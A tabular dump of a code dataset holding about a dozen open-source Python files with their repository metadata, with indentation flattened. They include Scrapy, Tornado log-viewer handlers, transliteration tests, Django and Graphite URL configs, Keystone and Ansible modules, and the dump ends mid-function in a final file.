code (string, 3 to 1.05M chars) | repo_name (string, 5 to 104 chars) | path (string, 4 to 251 chars) | language (1 class) | license (15 classes) | size (int64, 3 to 1.05M)
---|---|---|---|---|---|
import time
from collections import defaultdict
from unittest import TextTestRunner, TextTestResult as _TextTestResult
from scrapy.commands import ScrapyCommand
from scrapy.contracts import ContractsManager
from scrapy.utils.misc import load_object, set_environ
from scrapy.utils.conf import build_component_list
class TextTestResult(_TextTestResult):
def printSummary(self, start, stop):
write = self.stream.write
writeln = self.stream.writeln
run = self.testsRun
plural = "s" if run != 1 else ""
writeln(self.separator2)
writeln("Ran %d contract%s in %.3fs" % (run, plural, stop - start))
writeln()
infos = []
if not self.wasSuccessful():
write("FAILED")
failed, errored = map(len, (self.failures, self.errors))
if failed:
infos.append("failures=%d" % failed)
if errored:
infos.append("errors=%d" % errored)
else:
write("OK")
if infos:
writeln(" (%s)" % (", ".join(infos),))
else:
write("\n")
class Command(ScrapyCommand):
requires_project = True
default_settings = {'LOG_ENABLED': False}
def syntax(self):
return "[options] <spider>"
def short_desc(self):
return "Check spider contracts"
def add_options(self, parser):
ScrapyCommand.add_options(self, parser)
parser.add_option("-l", "--list", dest="list", action="store_true",
help="only list contracts, without checking them")
parser.add_option("-v", "--verbose", dest="verbose", default=False, action='store_true',
help="print contract tests for all spiders")
def run(self, args, opts):
# load contracts
contracts = build_component_list(self.settings.getwithbase('SPIDER_CONTRACTS'))
conman = ContractsManager(load_object(c) for c in contracts)
runner = TextTestRunner(verbosity=2 if opts.verbose else 1)
result = TextTestResult(runner.stream, runner.descriptions, runner.verbosity)
# contract requests
contract_reqs = defaultdict(list)
spider_loader = self.crawler_process.spider_loader
with set_environ(SCRAPY_CHECK='true'):
for spidername in args or spider_loader.list():
spidercls = spider_loader.load(spidername)
spidercls.start_requests = lambda s: conman.from_spider(s, result)
tested_methods = conman.tested_methods_from_spidercls(spidercls)
if opts.list:
for method in tested_methods:
contract_reqs[spidercls.name].append(method)
elif tested_methods:
self.crawler_process.crawl(spidercls)
# start checks
if opts.list:
for spider, methods in sorted(contract_reqs.items()):
if not methods and not opts.verbose:
continue
print(spider)
for method in sorted(methods):
print(' * %s' % method)
else:
start = time.time()
self.crawler_process.start()
stop = time.time()
result.printErrors()
result.printSummary(start, stop)
self.exitcode = int(not result.wasSuccessful())
| eLRuLL/scrapy | scrapy/commands/check.py | Python | bsd-3-clause | 3,403 |
from .rule_base import RuleBase
class RuleChildren(RuleBase):
""" rule = rule_children( parser, rule, next_rule )
rule_children constructor. Pass in the parser object that the rule is for, the rule
that is being parsed, and the next rule in the parsing chain.
This class takes as input a list of parser classes to be matched against the string
being parsed. During parsing, it will attempt to fit any of the child parsers (in
any order) against the string being parsed. After each match, the matched contents
will be removed and parsing will start again. This repeats until no more matches
can be found.
keys for the rules dictionary:
========= ========
key contents
========= ========
name The name of the rule
classes A list with classes to be matched
optional (optional) If true, denotes that this rule is optional
========= ========
:param parser: The parser that this rule belongs to
:param rule: A dictionary representing the rule configuration (see each rule class for details)
:param next_rule: A dictionary representing the next rule
:type parser: parser
:type rule: dict
:type next_rule: dict
:returns: rule object
"""
require_value = False
classes = []
def __init__(self, parser, rule, next_rule):
super().__init__(parser, rule, next_rule)
if not 'classes' in self.rule:
raise ValueError('Missing classes for children rule %s in %s' % (rule, self.parser_class))
if not self.rule['classes']:
raise ValueError('Missing classes for children rule %s in %s' % (rule, self.parser_class))
self.classes = self.rule['classes']
def parse(self, string):
matches = []
# we need to keep looping through the children looking for matches
# to the string until we no longer get any matches. Then return.
c = 0
while string:
c += 1
if c > 1000:
raise ValueError('Max depth reached')
shortest_leftover = False
best_match = False
best_leftover = ''
current_string = string
for child in self.classes:
# let the child parse the string
child_parser = child()
leftover = child_parser.parse(current_string)
# if it didn't do anything then this child didn't match
if not child_parser.matched:
continue
# It is possible that more than one child matches. If so,
# prioritize the child that matches the largest part of the
# string. All else being equal, first come first serve
if best_match:
if len(leftover) < shortest_leftover:
shortest_leftover = len(leftover)
best_match = child_parser
best_leftover = leftover
else:
shortest_leftover = len(leftover)
best_match = child_parser
best_leftover = leftover
# we have a match!
if best_match:
string = best_leftover
matches.append(best_match)
# If we didn't find anything then we are completely done
else:
if matches:
self.leftovers = string
self.result = matches
return True
else:
self.leftovers = string
self.result = ''
return False
# the only way we would get here is if we matched the entire string
self.leftovers = ''
self.result = matches
return True
| cmancone/mygrations | mygrations/core/parse/rule_children.py | Python | mit | 3,841 |
# -*- coding: utf-8 -*-
from tests import HangulizeTestCase
from hangulize.langs.isl import Icelandic
class IcelandicTestCase(HangulizeTestCase):
lang = Icelandic()
def test_people(self):
self.assert_examples({
'Agnar Helgason': '아그나르 헬가손',
'Ágústa Eva Erlendsdóttir': '아우구스타 에바 에를렌스도티르',
'Albert Guðmundsson': '알베르트 그뷔드뮌손',
'Ari Þorgilsson': '아리 소르길손',
'Arnaldur Indriðason': '아르드날뒤르 인드리다손',
'Árni Magnússon': '아우르드니 마그누손',
'Árni Sigfússon': '아우르드니 시그푸손',
'Ásgeir Ásgeirsson': '아우스게이르 아우스게이르손',
'Ásgeir Helgason': '아우스게이르 헬가손',
'Ásgeir Sigurvinsson': '아우스게이르 시귀르빈손',
'Ásmundur Sveinsson': '아우스뮌뒤르 스베인손',
'Baltasar Kormákur': '발타사르 코르마우퀴르',
'Björgólfur Guðmundsson': '비외르골뷔르 그뷔드뮌손',
'Björgólfur Thor Björgólfsson': '비외르골뷔르 소르 비외르골프손',
'Björgvin Halldórsson': '비외르그빈 하들도르손',
'Björk Guðmundsdóttir': '비외르크 그뷔드뮌스도티르',
'Björn Bjarnason': '비외르든 비아르드나손',
'Björn Hlynur Haraldsson': '비외르든 흘리뉘르 하랄손',
'Bragi Ólafsson': '브라이이 올라프손',
'Davíð Oddsson': '다비드 오드손',
'Davíð Stefánsson': '다비드 스테파운손',
'Eggert Pálsson': '에게르트 파울손',
'Eiður Smári Guðjohnsen': '에이뒤르 스마우리 그뷔드요흔센',
'Einar Bárðarson': '에이나르 바우르다르손',
'Einar Benediktsson': '에이나르 베네딕츠손',
'Einar Hákonarson': '에이나르 하우코나르손',
'Einar Hjörleifsson Kvaran': '에이나르 혜르들레이프손 크바란',
'Einar Jónsson': '에이나르 욘손',
'Einar Kárason': '에이나르 카우라손',
'Einar Már Guðmundsson': '에이나르 마우르 그뷔드뮌손',
'Einar Örn Benediktsson': '에이나르 외르든 베네딕츠손',
'Eiríkur rauði': '에이리퀴르 뢰이디',
'Eiríkur Hauksson': '에이리퀴르 회익손',
'Emilíana Torrini Davíðsdóttir': '에밀리아나 토리니 다비스도티르',
'Freydís Eiríksdóttir': '프레이디스 에이릭스도티르',
'Friðrik Ólafsson': '프리드리크 올라프손',
'Friðrik Þór Friðriksson': '프리드리크 소르 프리드릭손',
'Garðar': '가르다르',
'Geir Hilmar': '게이르 힐마르',
'Gisli Gudjonsson': '기슬리 그뷔드욘손',
'Gísli Örn Garðarsson': '기슬리 외르든 가르다르손',
'Gísli Pálsson': '기슬리 파울손',
'Guðmundur Arason': '그뷔드뮌뒤르 아라손',
'Guðmundur Hagalín': '그뷔드뮌뒤르 하갈린',
'Guðríður Þorbjarnardóttir': '그뷔드리뒤르 소르비아르드나르도티르',
'Gunnfríður Jónsdóttir': '귄프리뒤르 욘스도티르',
'Hafdís Huld': '하프디스 휠드',
'Halldór Ásgrímsson': '하들도르 아우스그림손',
'Halldór Blöndal': '하들도르 블뢴달',
'Halldór Kiljan Laxness': '하들도르 킬리안 락스네스',
'Hallgrímur Helgason': '하들그리뮈르 헬가손',
'Hannes Hafstein': '한네스 하프스테인',
'Hannes Hólmsteinn Gissurarson': '한네스 홀름스테이든 기쉬라르손',
'Hannibal Valdimarsson': '한니발 발디마르손',
'Haukur Tómasson': '회이퀴르 토마손',
'Heiðar Helguson': '헤이다르 헬귀손',
'Helgi Valdimarsson': '헬기 발디마르손',
'Hermann Hreiðarsson': '헤르만 흐레이다르손',
'Hilmar Örn Hilmarsson': '힐마르 외르든 힐마르손',
'Hilmir Snær Guðnason': '힐미르 스나이르 그뷔드나손',
'Hólmfríður Karlsdóttir': '홀름프리뒤르 카르들스도티르',
'Hrafn Gunnlaugsson': '흐라픈 귄뢰익손',
'Hreiðar Már Sigurðsson': '흐레이다르 마우르 시귀르손',
'Ingólfur Arnarson': '잉골뷔르 아르드나르손',
'Ísleifur Gissurarson': '이슬레이뷔르 기쉬라르손',
'Ívar Ingimarsson': '이바르 잉기마르손',
'Jóhanna Sigurðardóttir': '요한나 시귀르다르도티르',
'Jóhannes Karl Gudjonsson': '요한네스 카르들 그뷔드욘손',
'Jóhannes úr Kötlum': '요한네스 우르 쾨틀륌',
'Jón Ásgeir Jóhannesson': '욘 아우스게이르 요한네손',
'Jón Baldvin Hannibalsson': '욘 발드빈 한니발손',
'Jón Kalman Stefánsson': '욘 칼만 스테파운손',
'Jón Leifs': '욘 레이프스',
'Jón Loftsson': '욘 로프츠손',
'Jón Páll Sigmarsson': '욘 파우들 시그마르손',
'Jón Sigurðsson': '욘 시귀르손',
'Jón Thoroddsen': '욘 소로드센',
'Jónas Hallgrímsson': '요나스 하들그림손',
'Kári Stefánsson': '카우리 스테파운손',
'Kjartan Ólafsson': '캬르탄 올라프손',
'Kolbeinn Tumason': '콜베이든 튀마손',
'Kristín Marja Baldursdóttir': '크리스틴 마리아 발뒤르스도티르',
'Kristján Eldjárn': '크리스티아운 엘디아우르든',
'Leifur Eiríksson': '레이뷔르 에이릭손',
'Linda Pétursdóttir': '린다 피에튀르스도티르',
'Loftur Sæmundsson': '로프튀르 사이뮌손',
'Magnús Magnússon': '마그누스 마그누손',
'Magnús Þorsteinsson': '마그누스 소르스테인손',
'Magnús Ver Magnússon': '마그누스 베르 마그누손',
'Margrét Hermanns Auðardóttir': '마르그리에트 헤르만스 외이다르도티르',
'Margrét Vilhjálmsdóttir': '마르그리에트 빌햐울름스도티르',
'Markús Örn Antonsson': '마르쿠스 외르든 안톤손',
'Mugison': '뮈이이손',
'Nína Dögg Filippusdóttir': '니나 되그 필리퓌스도티르',
'Ólafur Darri Ólafsson': '올라뷔르 다리 올라프손',
'Ólafur Egill Ólafsson': '올라뷔르 에이이들 올라프손',
'Ólafur Jóhann Ólafsson': '올라뷔르 요한 올라프손',
'Ólafur Ragnar Grímsson': '올라뷔르 라그나르 그림손',
'Örvar Þóreyjarson Smárason': '외르바르 소레이야르손 스마우라손',
'Páll Skúlason': '파우들 스쿨라손',
'Ragnar Bjarnason': '라그나르 비아르드나손',
'Ragnar Bragason': '라그나르 브라가손',
'Ragnheiður Gröndal': '라근헤이뒤르 그뢴달',
'Silvía Nótt': '실비아 노트',
'Sigurður Helgason': '시귀르뒤르 헬가손',
'Sigurður Nordal': '시귀르뒤르 노르달',
'Sigurður Þórarinsson': '시귀르뒤르 소라린손',
'Sjón': '숀',
'Snorri Hjartarson': '스노리 햐르타르손',
'Snorri Sturluson': '스노리 스튀르들뤼손',
'Steingrímur Hermannsson': '스테잉그리뮈르 헤르만손',
'Steinunn Sigurðardóttir': '스테이뉜 시귀르다르도티르',
'Stefán Guðmundur Guðmundsson': '스테파운 그뷔드뮌뒤르 그뷔드뮌손',
'Sveinn Björnsson': '스베이든 비외르든손',
'Þóra Magnúsdóttir': '소라 마그누스도티르',
'Þórarinn Eldjárn': '소라린 엘디아우르든',
'Þórbergur Þórðarson': '소르베르귀르 소르다르손',
'Þorfinnur Karlsefni': '소르핀뉘르 카르들세프니',
'Þorgeirr Þorkelsson Ljósvetningagoði': '소르게이르 소르켈손 리오스베트닝가고디',
'Thorkell Atlason': '소르케들 아틀라손',
'Þorsteinn Gylfason': '소르스테이든 길바손',
'Þorsteinn Pálsson': '소르스테이든 파울손',
'Þorvaldur Eiríksson': '소르발뒤르 에이릭손',
'Tinna Gunnlaugsdóttir': '틴나 귄뢰익스도티르',
'Tómas Guðmundsson': '토마스 그뷔드뮌손',
'Unnur Birna Vilhjálmsdóttir': '윈뉘르 비르드나 빌햐울름스도티르',
'Vala Flosadottir': '발라 플로사도티르',
'Vigdís Finnbogadóttir': '비그디스 핀보가도티르',
'Vigdís Grímsdóttir': '비그디스 그림스도티르',
'Viktor Arnar Ingólfsson': '빅토르 아르드나르 잉골프손',
'Vilhjálmur Árnason': '빌햐울뮈르 아우르드나손',
'Vilhjálmur Stefánsson': '빌햐울뮈르 스테파운손',
})
def test_places(self):
self.assert_examples({
'Akranes': '아크라네스',
'Akureyri': '아퀴레이리',
'Blöndós': '블뢴도스',
'Bolungarvík': '볼룽가르비크',
'Borgafjörður': '보르가피외르뒤르',
'Borganes': '보르가네스',
'Dalvík': '달비크',
'Djúpivogur': '디우피보귀르',
'Egilsstaðir': '에이일스타디르',
'Eyjafjallajökull': '에이야피아들라예퀴들',
'Goðafoss': '고다포스',
'Grímsey': '그림세이',
'Grindavík': '그린다비크',
'Hafnarfjörður': '하프나르피외르뒤르',
'Höfn í Hornafirði': '회픈 이 호르드나피르디',
'Hofsjökull': '호프스예퀴들',
'Hólmavík': '홀마비크',
'Húsavík': '후사비크',
'Hvammstangi': '크밤스타웅기',
'Hvíta': '크비타',
'Hvolsvöllur': '크볼스뵈들뤼르',
'Ísafjörður': '이사피외르뒤르',
'Keflavík': '케플라비크',
'Kópavogur': '코파보귀르',
'Lagarfljólt': '라가르플리올트',
'Langjökull': '라웅그예퀴들',
'Mosfellsbær': '모스펠스바이르',
'Mýrdalsjökull': '미르달스예퀴들',
'Mývatn': '미바튼',
'Neskaupstaður': '네스쾨이프스타뒤르',
'Njarðvík': '니아르드비크',
'Ólafsfjörður': '올라프스피외르뒤르',
'Ólafsvík': '올라프스비크',
'Raufarhöfn': '뢰이바르회픈',
'Reykjanes': '레이캬네스',
'Reykjavík': '레이캬비크',
'Sauðárkrókur': '쇠이다우르크로퀴르',
'Selfoss': '셀포스',
'Seyðisfjörður': '세이디스피외르뒤르',
'Siglufjörður': '시글뤼피외르뒤르',
'Skjálfandafljót': '스캬울반다플리오트',
'Stykkishólmur': '스티키스홀뮈르',
'Surtsey': '쉬르트세이',
'Vatnajökull': '바트나예퀴들',
'Vík': '비크',
'Vopnafjörður': '보프나피외르뒤르',
'Þingvellir': '싱그베들리르',
'Þjórsá': '시오르사우',
'Þórisvatn': '소리스바튼',
'Þorlákshöfn': '소를라욱스회픈',
'Þórshöfn': '소르스회픈',
        })
| Jinwithyoo/han | tests/isl.py | Python | bsd-3-clause | 12,082 |
from dock import client
def fmt(container):
image, name = ns(container)
return '[{image}/{name}]'.format(image=image, name=name)
def ns(container):
image_name = container.attrs['Image']
image = client.images.get(image_name)
if len(image.tags) > 0:
image_name = image.tags[0].split(":")[0]
else:
image_name = image.short_id.split(":")[1]
    image_name = image_name.replace('/', '-')
return image_name, container.name
def exposed_ports(container):
ports = container.attrs['Config']['ExposedPorts'].keys()
for port in ports:
        port, protocol = port.split('/')
yield port, protocol
def exposes_ports(container):
return 'ExposedPorts' in container.attrs['Config'] | regiontog/macvlan-ipvs-dr | src/container.py | Python | mit | 778 |
import json
import logging
import pymongo
from bson.objectid import ObjectId
from tornado import gen
from tornado.ioloop import IOLoop
from tornado.web import RequestHandler, authenticated
from tornado.websocket import WebSocketHandler
from .conf import config
from .exceptions import LogsterException
logger = logging.getLogger('webapp')
class BaseHandler:
@property
def db(self):
return self.application.db
@property
def json_body(self):
        if not self.request.body:
return None
body = self.request.body.decode('utf-8')
return json.loads(body) if body else None
def get_current_user(self):
return self.get_secure_cookie('user')
class BaseRequestHandler(BaseHandler, RequestHandler):
pass
class BaseWebSocketHandler(BaseHandler, WebSocketHandler):
pass
class IndexHandler(BaseRequestHandler):
@gen.coroutine
@authenticated
def get(self):
self.render('index.html')
class LoginHandler(BaseRequestHandler):
def get(self):
self.render('login.html')
@gen.coroutine
def post(self):
username = self.get_argument('username')
password = self.get_argument('password')
success, error = yield self._authenticate_user(username, password)
if success:
self.set_secure_cookie('user', username)
self.redirect('/')
else:
self.render('login.html', error=error)
@gen.coroutine
def _authenticate_user(self, username, password):
user = yield self.db.users.find_one({'username': username})
if user is None:
return False, 'Login does not exist'
if user.get('password') != password:
return False, 'Password is invalid'
return True, None
class LogoutHandler(BaseRequestHandler):
@authenticated
def get(self):
self.clear_cookie('user')
self.redirect('/')
_web_socket_pool = {}
class ClientWebSocketHandler(BaseWebSocketHandler):
def check_origin(self, origin):
return True
def open(self):
user = self.get_secure_cookie('user')
logger.info('Authenticated user "%s" started websocket connection',
user)
self.log_name = self.get_argument('log')
IOLoop.current().spawn_callback(self._process_new_websocket)
@gen.coroutine
def _process_new_websocket(self):
try:
entries = yield self._get_initial_log_entries(self.log_name)
except LogsterException as e:
self.write_message(json.dumps({
'message_type': 'error',
'error': str(e)
}))
self.added = False
self.close()
return
self.write_message(json.dumps({
'message_type': 'new_entries',
'entries': entries
}))
if self.log_name not in _web_socket_pool:
_web_socket_pool[self.log_name] = []
_web_socket_pool[self.log_name].append(self)
self.added = True
logger.debug('Socket handler was added to the pool')
@gen.coroutine
def _get_initial_log_entries(self, log_name):
log = yield self.db.logs.find_one({
'name': log_name
})
if log is None:
raise LogsterException('Log is not found')
log_entries = yield self.db.entries.find({
'log': log['_id']
}).sort('order', pymongo.DESCENDING).limit(
config['app']['initialLineCount']).to_list(None)
return [{
'content': e['content'],
'order': e['order']
} for e in reversed(log_entries)]
def on_message(self, message):
pass
def on_close(self):
if not self.added:
return
_web_socket_pool[self.log_name].remove(self)
        logger.debug('Socket handler was removed from the pool (log=%s)',
                     self.log_name)
# def send_message(self, msg):
# self.write_message(json.dumps({'message': msg}))
# logger.debug('Message was sent (token=%s, msg="%s")',
# self.token, msg)
class ScannerNotificationsHandler(BaseRequestHandler):
@gen.coroutine
def post(self):
if self.request.remote_ip != '127.0.0.1':
logger.info('Skip notifications from non-localhost (ipaddr=%s)',
self.request.remote_ip)
return
# Body format:
# {
# "log_id": "<ObjectId hexstr>",
# "entry_ids": ["<ObjectId hexstr>", ...]
# }
body = self.json_body
logger.info('Scanner notification received (body: %s)', body)
self.log = yield self.db.logs.find_one({
'_id': ObjectId(body['log_id'])
})
if self.log is None:
logger.info('Log is not found, cannot process notification '
'(log_id=%s)', body['log_id'])
return
log_name = self.log['name']
if log_name != config['app']['defaultLog']:
# don't receive notfications from other locations than default
logger.info('Skip notifications from non-default log '
'(log_name=%s)', log_name)
return
self.entries = yield self.db.entries.find({
'_id': {
'$in': [ObjectId(ent) for ent in body['entry_ids']]
}
}).sort('order').to_list(None)
websock_message = json.dumps(self._build_client_notif_message())
websockets = _web_socket_pool.get(log_name, [])
for handler in websockets:
handler.write_message(websock_message)
def _build_client_notif_message(self):
return {
'message_type': 'new_entries',
'entries': [{
'content': e['content'],
'order': e['order']
} for e in self.entries]
}
| irvind/logster | logster/handlers.py | Python | mit | 5,948 |
"""
This module allows you to mock the config file as needed.
A default fixture that simply returns a safe-to-modify copy of
the default value is provided.
This can be overridden by parametrizing over the option you wish to
mock.
e.g.
>>> @pytest.mark.parametrize("extension_initial_dot", (True, False))
... def test_fixture(mock_config, extension_initial_dot):
... import bids
... assert bids.config.get_option("extension_initial_dot") == extension_initial_dot
"""
from unittest.mock import patch
import pytest
@pytest.fixture
def config_paths():
import bids.config
return bids.config.get_option('config_paths').copy()
@pytest.fixture
def extension_initial_dot():
import bids.config
return bids.config.get_option('extension_initial_dot')
@pytest.fixture
def mock_config(config_paths, extension_initial_dot):
import bids.config
with patch.dict('bids.config._settings'):
bids.config._settings['config_paths'] = config_paths
bids.config._settings['extension_initial_dot'] = extension_initial_dot
yield
| INCF/pybids | bids/conftest.py | Python | mit | 1,063 |
"""pocimport URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^', include('importing.urls', namespace='importing'))
]
| wbar/poc-import | src/pocimport/pocimport/urls.py | Python | mit | 823 |
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Example reboot device test with GDM + Mobly.
Usage:
python3 mobly_example_test.py -c ~/gazoo/testbeds/One-Somedevice.yml
See README.md for more details.
"""
import logging
import os
import sys
from typing import List
import gazoo_device
from mobly import asserts
from mobly import base_test
from mobly import test_runner
# If using a device controller from an extension package:
# import my_extension_package
# gazoo_device.register(my_extension_package)
_GAZOO_DEVICE_CONTROLLER = "GazooDevice"
class MoblyExampleRebootTest(base_test.BaseTestClass):
"""Example reboot device test with GDM + Mobly."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.manager = None
self.devices = []
def setup_class(self):
"""Creates a Manager instance."""
super().setup_class()
self.manager = gazoo_device.Manager(
log_directory=self.log_path,
gdm_log_file=os.path.join(self.log_path, "gdm.log"),
# Avoid log duplication with Mobly's stdout log handler
stdout_logging=False)
def teardown_class(self):
"""Closes the Manager instance."""
self.manager.close()
self.manager = None
super().teardown_class()
def setup_test(self):
"""Creates device controllers for all devices in the testbed."""
super().setup_test()
gazoo_device_names = self._get_gazoo_device_names()
self.devices = [self.manager.create_device(device_name)
for device_name in gazoo_device_names]
logging.info("Created devices for test: %s",
[device.name for device in self.devices])
def teardown_test(self):
"""Closes all device controllers."""
for device in self.devices:
device.close()
self.devices = []
super().teardown_test()
def _get_gazoo_device_names(self) -> List[str]:
"""Extracts names of Gazoo devices from the testbed.
Raises:
RuntimeError: If the testbed config does not contain any "GazooDevice"
controller entries.
Returns:
Names of all GazooDevices in the testbed.
"""
gazoo_device_configs = self.controller_configs.get(
_GAZOO_DEVICE_CONTROLLER, [])
gazoo_device_names = [config["id"] for config in gazoo_device_configs]
if not gazoo_device_names:
raise RuntimeError(
f"The testbed config does not have any {_GAZOO_DEVICE_CONTROLLER} "
"controller entries")
return gazoo_device_names
def test_reboot(self):
"""Reboots all devices in the testbed."""
for device in self.devices:
device.reboot()
asserts.assert_true(
device.connected,
f"Device {device.name} did not come back online after reboot")
if __name__ == "__main__":
test_runner.main()
| google/gazoo-device | examples/device_tests/mobly_example_test.py | Python | apache-2.0 | 3,325 |
"""Copyright 2009 Chris Davis
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License."""
from django.conf.urls.defaults import *
urlpatterns = patterns('graphite.metrics.views',
('^index\.json$', 'index_json'),
('^search/?$', 'search_view'),
('^find/?$', 'find_view'),
('^expand/?$', 'expand_view'),
('^context/?$', 'context_view'),
('^get-metadata/?$', 'get_metadata_view'),
('^set-metadata/?$', 'set_metadata_view'),
('', 'find_view'),
)
| evernote/graphite-web | webapp/graphite/metrics/urls.py | Python | apache-2.0 | 941 |
#!/usr/bin/env python
'''
Copyright 2014 Nedim Srndic, University of Tuebingen
This file is part of Mimicus.
Mimicus is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Mimicus is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Mimicus. If not, see <http://www.gnu.org/licenses/>.
##############################################################################
FC.py
Reproduction of scenario FC.
Created on March 5, 2014.
'''
from argparse import ArgumentParser
import sys
from common import attack_mimicry
def main():
# Parse command-line arguments
parser = ArgumentParser()
parser.add_argument('--plot', help='Where to save plot (file name)',
default=False)
args = parser.parse_args()
# Perform the attack
scenario_name = 'FC'
attack_mimicry(scenario_name, args.plot)
return 0
if __name__ == '__main__':
sys.exit(main())
| srndic/mimicus | reproduction/FC.py | Python | gpl-3.0 | 1,320 |
import requests
def before_scenario(context, scenario):
"""equivalent of unittest setUp"""
ip = "localhost"
port = "1234"
context.base_url = "http://" + ip + ":" + port
requests.delete(context.base_url + '/books', timeout=5)
def after_scenario(context, scenario):
"""equivalent of unittest tearDown"""
requests.delete(context.base_url + '/books', timeout=5)
| bpuderer/python_test | behave_demo/environment.py | Python | mit | 389 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2012, Michael DeHaan <[email protected]>, and others
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# this is a windows documentation stub. actual code lives in the .ps1
# file of the same name
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = r'''
---
module: win_ping
version_added: "1.7"
short_description: A windows version of the classic ping module.
description:
- Checks management connectivity of a windows host
options:
data:
description:
- Alternate data to return instead of 'pong'
default: 'pong'
author: "Chris Church (@cchurch)"
'''
EXAMPLES = r'''
# Test connectivity to a windows host
# ansible winserver -m win_ping
# Example from an Ansible Playbook
- win_ping:
# Induce a crash to see what happens
- win_ping:
data: crash
'''
| dmitry-sobolev/ansible | lib/ansible/modules/windows/win_ping.py | Python | gpl-3.0 | 1,547 |
# -*- coding:utf-8 -*-
"""
Version: 1.0
Author: zhangjian
Site: http://iliangqunru.com
File: __init__.py.py
Time: 2017/7/22 2:19
"""
| Xarrow/pySimulatedDNS | dnsCat/__init__.py | Python | apache-2.0 | 139 |
import unittest
# from gitbench.db import BenchmarkDB # FIXME: test is actually empty
class TestBenchmarkDB(unittest.TestCase):
test_path = '__test__.db'
@classmethod
def setUpClass(cls):
pass
@classmethod
def tearDownClass(cls):
pass
if __name__ == '__main__':
import nose
nose.runmodule(argv=[__file__, '-vvs', '-x', '--pdb', '--pdb-failure'],
exit=False)
| cpcloud/vbench | vbench/tests/test_db.py | Python | mit | 430 |
# Copyright 2011 OpenStack LLC.
# Copyright 2011 Nebula, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from keystoneclient import base
class Group(base.Resource):
"""Represents an Identity user group.
Attributes:
* id: a uuid that identifies the group
* name: group name
* description: group description
"""
def update(self, name=None, description=None):
kwargs = {
'name': name if name is not None else self.name,
'description': (description
if description is not None
else self.description),
}
try:
retval = self.manager.update(self.id, **kwargs)
self = retval
except Exception:
retval = None
return retval
class GroupManager(base.CrudManager):
"""Manager class for manipulating Identity groups."""
resource_class = Group
collection_key = 'groups'
key = 'group'
def create(self, name, domain=None, description=None):
return super(GroupManager, self).create(
name=name,
domain_id=base.getid(domain),
description=description)
def list(self, user=None, **kwargs):
"""List groups.
If user is provided, then filter groups with
that attribute.
If ``**kwargs`` are provided, then filter groups with
attributes matching ``**kwargs``.
"""
if user:
base_url = '/users/%s' % base.getid(user)
else:
base_url = None
return super(GroupManager, self).list(
base_url=base_url,
**kwargs)
def get(self, group):
return super(GroupManager, self).get(
group_id=base.getid(group))
def update(self, group, name=None, description=None):
return super(GroupManager, self).update(
group_id=base.getid(group),
name=name,
description=description)
def delete(self, group):
return super(GroupManager, self).delete(
group_id=base.getid(group))
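# Illustrative usage sketch (not part of the original module). It assumes an
# authenticated keystoneclient v3 Client instance named `keystone`, whose
# `groups` attribute is a GroupManager; the variable name and the literal
# values are assumptions made for this example.
#
#   group = keystone.groups.create(name='admins', description='Admin users')
#   keystone.groups.update(group, description='Administrators')
#   for g in keystone.groups.list():
#       print(g.name)
#   keystone.groups.delete(group)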
| ioram7/keystone-federado-pgid2013 | build/python-keystoneclient/keystoneclient/v3/groups.py | Python | apache-2.0 | 2,666 |
import argparse
import random
import editdistance
import os
import numpy as np
from data_generator import Tokenizer
from data_generator import get_data_generator
from model import get_model
def visualization(i, a, b, c, d, e, directory1):
with open(directory1 + '/' + str(i) + '.txt', 'w') as f:
a = a + ["EOS_X"]
c = c + ["EOS_Y"]
f.write(str(i) + ' ')
f.write(' '.join(a))
f.write('\n')
f.write('switch ')
f.write(' '.join(str(x[0]) for x in e))
f.write('\n')
for p, q in zip(c, d):
f.write(p + ' ')
f.write(' '.join(str(x) for x in q))
f.write('\n')
def evaluation(test_X, test_Y, prediction, attention, switch, act, fn):
id2act = {i: a for a, i in act.items()}
actions = []
for pred in prediction:
acts = []
for id in pred:
if id == 0:
break
